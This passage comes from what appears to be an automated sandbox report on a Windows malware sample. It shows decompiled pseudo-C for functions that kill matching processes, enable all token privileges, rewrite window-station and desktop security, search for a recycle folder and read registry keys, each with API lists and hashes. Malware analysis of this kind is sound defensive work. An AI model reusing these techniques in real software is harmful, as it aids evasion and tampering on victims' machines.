					NtClose(_v12);
				}
				RtlFreeHeap( *0x40f5d6, 0, _v28);
				RtlFreeHeap( *0x40f5d6, 0, _v32);
				RtlFreeHeap( *0x40f5d6, 0, _v36);
				return _v8;
			}













                                                                                        0x00408021
                                                                                        0x00408032
                                                                                        0x0040803f
                                                                                        0x0040804c
                                                                                        0x00408074
                                                                                        0x00408076
                                                                                        0x0040807d
                                                                                        0x00408098
                                                                                        0x004080a0
                                                                                        0x004080b6
                                                                                        0x004080b6
                                                                                        0x004080be
                                                                                        0x004080d1
                                                                                        0x004080d8
                                                                                        0x004080e1
                                                                                        0x004080e7
                                                                                        0x004080d8
                                                                                        0x004080ed
                                                                                        0x004080ed
                                                                                        0x004080fe
                                                                                        0x0040810f
                                                                                        0x00408120
                                                                                        0x00408131

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EF6A,0040EF50,0040EF14,?,00000000), ref: 0040806C
                                                                                        • RegQueryValueExW.ADVAPI32(?,00408406,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 00408098
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 004080B6
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000010), ref: 004080CB
                                                                                        • wcscpy.NTDLL ref: 004080E1
                                                                                        • NtClose.NTDLL(?), ref: 004080ED
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 004080FE
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408406), ref: 0040810F
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408120
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateQueryValue$CloseCreatewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2243750011-0
                                                                                        • Opcode ID: 55728d4458d18e7443d7add074612f363d0046d66f9c92ce34b80a0e72f93bcc
                                                                                        • Instruction ID: f85d4f3be994af5f6a630e198cef73a289d7a9748beffedbe7bb81f6d4c47346
                                                                                        • Opcode Fuzzy Hash: 55728d4458d18e7443d7add074612f363d0046d66f9c92ce34b80a0e72f93bcc
                                                                                        • Instruction Fuzzy Hash: 6331D872940209BFDB219FD1EE06FEEBB78FB08701F10403AF601B55A0DB7566199B59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404878, Relevance: 12.1, APIs: 8, Instructions: 92memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			E00404878() {
				void* _v8;
				long _v12;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v48;
				long _t32;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				_v12 = 0x400;
				_v16 = RtlAllocateHeap( *0x40f5d6, 0, _v12);
				while(1) {
					_t32 = NtQuerySystemInformation(5, _v16, _v12,  &_v12);
					if(_t32 == 0) {
						break;
					}
					if(_t32 != 0xc0000004) {
						return RtlFreeHeap( *0x40f5d6, 0, _v16);
					} else {
						_v16 = RtlReAllocateHeap( *0x40f5d6, 0, _v16, _v12);
						continue;
					}
					L13:
				}
				_t44 = _v16;
				do {
					_t46 =  *_t44;
					if( *((intOrPtr*)(_t44 + 0x3c)) != 0 && E00404993( *((intOrPtr*)(_t44 + 0x3c))) != 0) {
						_v24 =  *((intOrPtr*)(_t44 + 0x44));
						_v20 = 0;
						_t45 =  &_v48;
						 *_t45 = 0x18;
						 *(_t45 + 4) = 0;
						 *(_t45 + 8) = 0;
						 *(_t45 + 0xc) = 0;
						 *(_t45 + 0x10) = 0;
						 *(_t45 + 0x14) = 0;
						if(NtOpenProcess( &_v8, 1,  &_v48,  &_v24) == 0) {
							 *0x40f708(_v8, 0);
							NtClose(_v8);
						}
					}
					_t44 = _t44 + _t46;
				} while (_t46 != 0);
				return RtlFreeHeap( *0x40f5d6, 0, _v16);
				goto L13;
			}













                                                                                        0x00404883
                                                                                        0x0040489b
                                                                                        0x0040489e
                                                                                        0x004048aa
                                                                                        0x004048b2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004048bd
                                                                                        0x004048f3
                                                                                        0x004048bf
                                                                                        0x004048d3
                                                                                        0x00000000
                                                                                        0x004048d3
                                                                                        0x00000000
                                                                                        0x004048bd
                                                                                        0x004048f6
                                                                                        0x004048f9
                                                                                        0x004048f9
                                                                                        0x004048ff
                                                                                        0x00404910
                                                                                        0x00404913
                                                                                        0x0040491a
                                                                                        0x0040491d
                                                                                        0x00404923
                                                                                        0x0040492a
                                                                                        0x00404931
                                                                                        0x00404938
                                                                                        0x0040493f
                                                                                        0x0040495c
                                                                                        0x00404963
                                                                                        0x0040496c
                                                                                        0x0040496c
                                                                                        0x0040495c
                                                                                        0x00404972
                                                                                        0x00404975
                                                                                        0x00404992
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00404895
                                                                                        • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 004048AA
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 004048CD
                                                                                        • NtOpenProcess.NTDLL(004090AB,00000001,?,?), ref: 00404954
                                                                                        • NtTerminateProcess.NTDLL(004090AB,00000000), ref: 00404963
                                                                                        • NtClose.NTDLL(004090AB), ref: 0040496C
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00404984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcess$CloseFreeInformationOpenQuerySystemTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2409702202-0
                                                                                        • Opcode ID: c237992f1ae81465338ccbc1534799c31967e5f99c2b722e03e45203d16c2f6e
                                                                                        • Instruction ID: 4ec7f60314bf77e7cd7c60aae2a05b8257771ca246b27cf7c6daa19baa7ad9ee
                                                                                        • Opcode Fuzzy Hash: c237992f1ae81465338ccbc1534799c31967e5f99c2b722e03e45203d16c2f6e
                                                                                        • Instruction Fuzzy Hash: A53160B6900208FFDF219F90DD45B9EBB78FB44314F2080B6E600B61A0D7765A59DF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040318A, Relevance: 10.6, APIs: 7, Instructions: 98nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040318A() {
				long _v8;
				struct HWINSTA__* _v12;
				struct HDESK__* _v16;
				short _v32;
				short _v48;
				char _v148;
				intOrPtr* _t43;
				intOrPtr* _t44;
				struct _GUID _t57;

				_t43 =  &_v32;
				 *_t43 = 0x690057;
				 *((intOrPtr*)(_t43 + 4)) = 0x53006e;
				 *((intOrPtr*)(_t43 + 8)) = 0x610074;
				 *((intOrPtr*)(_t43 + 0xc)) = 0x30;
				_t44 =  &_v48;
				 *_t44 = 0x650044;
				 *((intOrPtr*)(_t44 + 4)) = 0x610066;
				 *((intOrPtr*)(_t44 + 8)) = 0x6c0075;
				 *((intOrPtr*)(_t44 + 0xc)) = 0x74;
				_t57 =  &_v148;
				memset(_t57, 0, 0x64);
				 *_t57 = 1;
				 *((intOrPtr*)(_t57 + 0x28)) = 0x3c0002;
				 *((intOrPtr*)(_t57 + 0x2c)) = 1;
				 *((intOrPtr*)(_t57 + 0x30)) = 0x140000;
				 *((intOrPtr*)(_t57 + 0x34)) = 0x10000000;
				 *((intOrPtr*)(_t57 + 0x38)) = 0x101;
				 *((intOrPtr*)(_t57 + 0x3c)) = 0x1000000;
				if(E004016D2() >= 0x3e) {
					 *((intOrPtr*)(_t57 + 0x2c)) = 2;
					 *((intOrPtr*)(_t57 + 0x44)) = 0x180000;
					 *((intOrPtr*)(_t57 + 0x48)) = 0x10000000;
					 *((intOrPtr*)(_t57 + 0x4c)) = 0x201;
					 *((intOrPtr*)(_t57 + 0x50)) = 0xf000000;
					 *((intOrPtr*)(_t57 + 0x54)) = 2;
					 *((intOrPtr*)(_t57 + 0x58)) = 1;
				}
				 *((short*)(_t57 + 2)) = 4;
				 *((intOrPtr*)(_t57 + 0x10)) = _t57 + 0x28;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v12 = OpenWindowStationW( &_v32, 0, 0x40000);
				if(_v12 != 0) {
					if(NtSetSecurityObject(_v12, 4, _t57) == 0) {
						_v16 = OpenDesktopW( &_v48, 0, 0, 0x40081);
						if(_v16 != 0) {
							if(NtSetSecurityObject(_v16, 4, _t57) == 0) {
								_v8 = 1;
							}
						}
					}
				}
				if(_v16 != 0) {
					CloseDesktop(_v16);
				}
				if(_v12 != 0) {
					CloseWindowStation(_v12);
				}
				return _v8;
			}












                                                                                        0x00403198
                                                                                        0x0040319b
                                                                                        0x004031a1
                                                                                        0x004031a8
                                                                                        0x004031af
                                                                                        0x004031b6
                                                                                        0x004031b9
                                                                                        0x004031bf
                                                                                        0x004031c6
                                                                                        0x004031cd
                                                                                        0x004031d4
                                                                                        0x004031df
                                                                                        0x004031e8
                                                                                        0x004031ee
                                                                                        0x004031f5
                                                                                        0x004031fc
                                                                                        0x00403203
                                                                                        0x0040320a
                                                                                        0x00403211
                                                                                        0x00403220
                                                                                        0x00403222
                                                                                        0x00403229
                                                                                        0x00403230
                                                                                        0x00403237
                                                                                        0x0040323e
                                                                                        0x00403245
                                                                                        0x0040324c
                                                                                        0x0040324c
                                                                                        0x00403253
                                                                                        0x0040325c
                                                                                        0x0040325f
                                                                                        0x00403266
                                                                                        0x0040326d
                                                                                        0x00403285
                                                                                        0x0040328c
                                                                                        0x0040329e
                                                                                        0x004032b5
                                                                                        0x004032bc
                                                                                        0x004032ce
                                                                                        0x004032d2
                                                                                        0x004032d2
                                                                                        0x004032ce
                                                                                        0x004032bc
                                                                                        0x0040329e
                                                                                        0x004032dd
                                                                                        0x004032e2
                                                                                        0x004032e2
                                                                                        0x004032ec
                                                                                        0x004032f1
                                                                                        0x004032f1
                                                                                        0x00403302

                                                                                        APIs
                                                                                        • memset.NTDLL ref: 004031DF
                                                                                        • OpenWindowStationW.USER32(?,00000000,00040000), ref: 0040327F
                                                                                        • NtSetSecurityObject.NTDLL(00000000,00000004,?), ref: 00403296
                                                                                        • OpenDesktopW.USER32(?,00000000,00000000,00040081), ref: 004032AF
                                                                                        • CloseDesktop.USER32(00000000,?,?,00000000), ref: 004032E2
                                                                                        • CloseWindowStation.USER32(00000000,?,?,00000000), ref: 004032F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseDesktopOpenStationWindow$ObjectSecuritymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1804051820-0
                                                                                        • Opcode ID: 5b8868e912488fa295ccd887e7dd77f6af64cd584d6cb10ce062927d4210feee
                                                                                        • Instruction ID: 8f42192c281bcc17ce305c1db20c10bd6e17a55d0e5b1cfdd6cac66eb2108c57
                                                                                        • Opcode Fuzzy Hash: 5b8868e912488fa295ccd887e7dd77f6af64cd584d6cb10ce062927d4210feee
                                                                                        • Instruction Fuzzy Hash: AE410EB0900208EFEB10DF55D98DB997FB8FF04319F1081B9E9056B295D3BA9688CF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408249, Relevance: 10.6, APIs: 7, Instructions: 95memoryregistrynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00408249() {
				void* _v8;
				void* _v12;
				int _v16;
				int _v20;
				int _v24;
				short* _v28;
				short* _v32;
				char _v160;
				void* _t48;

				_v28 = E00401D08(0x40ef82);
				_v32 = E00401D08(0x40effc);
				memset( &_v160, 0, 0x80);
				if(RegCreateKeyExW(0x80000002, _v28, 0, 0, 0, 0x20119, 0,  &_v12,  &_v24) == 0) {
					_v16 = 1;
					_v20 = 0x80;
					if(RegQueryValueExW(_v12, _v32, 0,  &_v16,  &_v160,  &_v20) == 0) {
						_t48 = E00401060( &_v160, _v20, 0);
						if(E00401D45( &_v160) != 0) {
							_t48 = E00401060( &_v160, _t43, 1);
						}
						_v8 = RtlAllocateHeap( *0x40f5d6, 8, 0x2a);
						if(_v8 != 0) {
							E0040116C(_t48, 0xa, _v8);
						}
					}
					NtClose(_v12);
				}
				RtlFreeHeap( *0x40f5d6, 0, _v28);
				RtlFreeHeap( *0x40f5d6, 0, _v32);
				return _v8;
			}












                                                                                        0x00408261
                                                                                        0x0040826e
                                                                                        0x0040827f
                                                                                        0x004082ad
                                                                                        0x004082b3
                                                                                        0x004082ba
                                                                                        0x004082e0
                                                                                        0x004082f3
                                                                                        0x00408303
                                                                                        0x00408314
                                                                                        0x00408314
                                                                                        0x00408326
                                                                                        0x0040832d
                                                                                        0x00408335
                                                                                        0x00408335
                                                                                        0x0040832d
                                                                                        0x0040833d
                                                                                        0x0040833d
                                                                                        0x0040834e
                                                                                        0x0040835f
                                                                                        0x00408370

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • memset.NTDLL ref: 0040827F
                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,0040F1F6,00000000,00000000,00000000,00020119,00000000,?,?,?,?,00000000), ref: 004082A5
                                                                                        • RegQueryValueExW.ADVAPI32(?,00408ACB,00000000,00000001,?,00000080,?,?,00000000), ref: 004082D8
                                                                                        • NtClose.NTDLL(?), ref: 0040833D
                                                                                          • Part of subcall function 00401D45: RegCreateKeyExW.KERNELBASE(80000002,00000000,00000000,00000000,00000000,00020119,00000000,?,?,0040CE73,?,?), ref: 00401D89
                                                                                          • Part of subcall function 00401D45: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000080,0040CEB7), ref: 00401DC6
                                                                                          • Part of subcall function 00401D45: memcpy.NTDLL(00000001,?,00000080), ref: 00401DDD
                                                                                          • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401DEF
                                                                                          • Part of subcall function 00401D45: NtClose.NTDLL(?), ref: 00401DF8
                                                                                          • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401E07
                                                                                        • RtlAllocateHeap.NTDLL(00000008,0000002A,?), ref: 00408320
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040F1F6), ref: 0040834E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408ACB), ref: 0040835F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateCloseCreateQueryValue$memcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 2663019618-0
                                                                                        • Opcode ID: 37b1e7a26de76420a26c1c05f40112fa04460ebfdba43d7db358e900db441a9c
                                                                                        • Instruction ID: d943c196a3c570d0850543c5f98d4913f7b2424a9b04244dcf19ba695f8b1b68
                                                                                        • Opcode Fuzzy Hash: 37b1e7a26de76420a26c1c05f40112fa04460ebfdba43d7db358e900db441a9c
                                                                                        • Instruction Fuzzy Hash: 15316E71E40208BBEB219BA1DD06FEEBB7CFB04701F104076F604B60E1DA756A588B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408160, Relevance: 10.6, APIs: 7, Instructions: 74memoryregistrynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00408160() {
				void* _v8;
				void* _v12;
				int _v16;
				int _v20;
				int _v24;
				short* _v28;
				short* _v32;
				long _v160;

				_v8 = 0;
				_v28 = E00401D08(0x40ef82);
				_v32 = E00401D08(0x40efe0);
				if(RegCreateKeyExW(0x80000002, _v28, 0, 0, 0, 0x20119, 0,  &_v12,  &_v24) == 0) {
					_v16 = 1;
					_v20 = 0x80;
					if(RegQueryValueExW(_v12, _v32, 0,  &_v16,  &_v160,  &_v20) == 0) {
						_v8 = RtlAllocateHeap( *0x40f5d6, 8, _v20);
						if(_v8 != 0) {
							wcscpy(_v8,  &_v160);
						}
					}
					NtClose(_v12);
				}
				RtlFreeHeap( *0x40f5d6, 0, _v28);
				RtlFreeHeap( *0x40f5d6, 0, _v32);
				return _v8;
			}











                                                                                        0x0040816e
                                                                                        0x0040817f
                                                                                        0x0040818c
                                                                                        0x004081b4
                                                                                        0x004081b6
                                                                                        0x004081bd
                                                                                        0x004081e3
                                                                                        0x004081f6
                                                                                        0x004081fd
                                                                                        0x00408209
                                                                                        0x0040820f
                                                                                        0x004081fd
                                                                                        0x00408215
                                                                                        0x00408215
                                                                                        0x00408226
                                                                                        0x00408237
                                                                                        0x00408248

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EFE0,0040EF82,?,00000000,?,?,00000000), ref: 004081AC
                                                                                        • RegQueryValueExW.ADVAPI32(?,00408416,00000000,00000001,?,00000080,?,00000000,?,?,00000000), ref: 004081DB
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000080), ref: 004081F0
                                                                                        • wcscpy.NTDLL ref: 00408209
                                                                                        • NtClose.NTDLL(?), ref: 00408215
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 00408226
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408416), ref: 00408237
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree$CloseCreateQueryValuewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3057291146-0
                                                                                        • Opcode ID: 5240ba0683cb618bbb201cce863153eb6707ef154bb6a119b20aed93760c9151
                                                                                        • Instruction ID: 7e96c7c701486afcc560675b8f1a08436bf5a0fcd1cf14c0b36be41fd08da956
                                                                                        • Opcode Fuzzy Hash: 5240ba0683cb618bbb201cce863153eb6707ef154bb6a119b20aed93760c9151
                                                                                        • Instruction Fuzzy Hash: C521EB72940209FFEB219FD1DE06FAEBB78FB04701F10407AF605B11A1DB752A199B58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402160, Relevance: 10.6, APIs: 7, Instructions: 70nativememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 23%
                                                                                        			E00402160() {
				void* _v8;
				long _v12;
				void* _v16;
				void* _t20;
				void* _t27;
				void* _t30;
				void* _t31;

				_t20 =  *0x40f6e4(0xffffffff, 0x28,  &_v8);
				if(_t20 == 0) {
					 *0x40f6d0(_v8, 3,  &_v16, 4,  &_v12);
					_v16 = RtlAllocateHeap( *0x40f5d6, 8, _v12);
					if(_v16 == 0) {
						L9:
						return NtClose(_v8);
					}
					_t27 =  *0x40f6d0(_v8, 3, _v16, _v12,  &_v12);
					if(_t27 != 0) {
						L8:
						RtlFreeHeap( *0x40f5d6, 0, _v16);
						goto L9;
					}
					_t31 = _v16;
					asm("lodsd");
					_t30 = _t27;
					do {
						if( *((intOrPtr*)(_t31 + 8)) != 3) {
							 *((intOrPtr*)(_t31 + 8)) = 3;
						}
						_t31 = _t31 + 0xc;
						_t30 = _t30 - 1;
					} while (_t30 != 0);
					 *0x40f6e8(_v8, 0, _v16, 0, 0, 0);
					goto L8;
				}
				return _t20;
			}










                                                                                        0x00402173
                                                                                        0x0040217b
                                                                                        0x00402190
                                                                                        0x004021a7
                                                                                        0x004021ae
                                                                                        0x00402209
                                                                                        0x00000000
                                                                                        0x0040220c
                                                                                        0x004021bf
                                                                                        0x004021c7
                                                                                        0x004021f8
                                                                                        0x00402203
                                                                                        0x00000000
                                                                                        0x00402203
                                                                                        0x004021c9
                                                                                        0x004021cc
                                                                                        0x004021cd
                                                                                        0x004021cf
                                                                                        0x004021d3
                                                                                        0x004021d5
                                                                                        0x004021d5
                                                                                        0x004021dc
                                                                                        0x004021df
                                                                                        0x004021e0
                                                                                        0x004021f2
                                                                                        0x00000000
                                                                                        0x004021f2
                                                                                        0x0040221a

                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                        • NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                        • NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                        • NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                        • NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Token$HeapInformationQuery$AdjustAllocateCloseFreeOpenPrivilegesProcess
                                                                                        • String ID:
                                                                                        • API String ID: 171759394-0
                                                                                        • Opcode ID: d6cc3f43a27decc4a072a415d9359db09a0b4e6609930ab19c7573de194aa27b
                                                                                        • Instruction ID: c79a791a82b3b0d9800e1b3040d21526624686fe0a1f1f536f66a104b832bba7
                                                                                        • Opcode Fuzzy Hash: d6cc3f43a27decc4a072a415d9359db09a0b4e6609930ab19c7573de194aa27b
                                                                                        • Instruction Fuzzy Hash: BD215836940208BFEB218B90ED09FAEBB79FB44711F1045B5F621B61F0D7721A49DB18
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403FBA, Relevance: 10.6, APIs: 7, Instructions: 68fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00403FBA(wchar_t* _a4, wchar_t* _a8) {
				union _FINDEX_INFO_LEVELS _v8;
				void* _v12;
				char _v32;
				short _v552;
				struct _WIN32_FIND_DATAW _v1144;
				wchar_t* _t28;

				_v8 = 0;
				wcscpy( &_v552, _a4);
				_t28 =  &_v32;
				 *_t28 = 0x72002a;
				_t28[1] = 0x630065;
				_t28[2] = 0x630079;
				_t28[3] = 0x65006c;
				_t28[4] = 0x2a;
				wcscat( &_v552, _t28);
				_v12 = FindFirstFileExW( &_v552, 0,  &_v1144, 0, 0, 0);
				if(_v12 != 0xffffffff) {
					while((_v1144.dwFileAttributes & 0x00000010) == 0) {
						if(FindNextFileW(_v12,  &_v1144) != 0) {
							continue;
						}
						L4:
						FindClose(_v12);
						goto L5;
					}
					wcscpy(_a8, _a4);
					wcscat(_a8,  &(_v1144.cFileName));
					_v8 = 1;
					goto L4;
				}
				L5:
				return _v8;
			}









                                                                                        0x00403fc8
                                                                                        0x00403fd9
                                                                                        0x00403fe2
                                                                                        0x00403fe5
                                                                                        0x00403feb
                                                                                        0x00403ff2
                                                                                        0x00403ff9
                                                                                        0x00404000
                                                                                        0x0040400f
                                                                                        0x00404034
                                                                                        0x0040403b
                                                                                        0x0040403d
                                                                                        0x00404086
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404088
                                                                                        0x0040408b
                                                                                        0x00000000
                                                                                        0x0040408b
                                                                                        0x0040404f
                                                                                        0x00404062
                                                                                        0x0040406b
                                                                                        0x00000000
                                                                                        0x0040406b
                                                                                        0x00404091
                                                                                        0x0040409c

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Find$Filewcscatwcscpy$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3302616064-0
                                                                                        • Opcode ID: 3db659683c7b999952af6ee28f553bf6215fb1bfafd81eec022c881602763db6
                                                                                        • Instruction ID: 04740b053a823cf9da96ab29fd9f7270a491be09eb208749cab9ea2bc689e4d1
                                                                                        • Opcode Fuzzy Hash: 3db659683c7b999952af6ee28f553bf6215fb1bfafd81eec022c881602763db6
                                                                                        • Instruction Fuzzy Hash: CC215EB1900108EFDB209F90ED08F99BBBCEB44315F1045B5EA08A61A1D7769A598F69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405564, Relevance: 9.1, APIs: 6, Instructions: 96memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E00405564() {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				char _v32;
				long _t34;
				void* _t37;
				void* _t43;
				void* _t45;
				intOrPtr* _t48;
				void* _t49;
				void* _t50;

				_v8 = 0;
				_v20 = 0x400;
				_v16 = RtlAllocateHeap( *0x40f5d6, 0, _v20);
				while(1) {
					_t34 = NtQueryObject(0, 3, _v16, _v20,  &_v20);
					if(_t34 == 0) {
						break;
					}
					if(_t34 != 0xc0000004) {
						return RtlFreeHeap( *0x40f5d6, 0, _v16);
					} else {
						_v20 = _v20 + 0x28;
						_v16 = RtlReAllocateHeap( *0x40f5d6, 0, _v16, _v20);
						continue;
					}
					L16:
				}
				_t48 =  &_v32;
				 *_t48 = 0x690046;
				 *((intOrPtr*)(_t48 + 4)) = 0x65006c;
				 *(_t48 + 8) = 0;
				_t49 = _v16;
				asm("lodsd");
				_v12 = _t34;
				_t45 = 0;
				while(1) {
					_t37 =  *0x40f694( *((intOrPtr*)(_t49 + 4)), _t48);
					_t50 = _t50 + 8;
					if(_t37 == 0) {
						break;
					}
					_t49 = (( *(_t49 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + _t49 + 0x60;
					_t45 = _t45 + 1;
					_v12 = _v12 - 1;
					if(_v12 != 0) {
						continue;
					}
					L15:
					RtlFreeHeap( *0x40f5d6, 0, _v16);
					return _v8;
					goto L16;
				}
				_t43 = E004016D2();
				if(_t43 < 0x3f) {
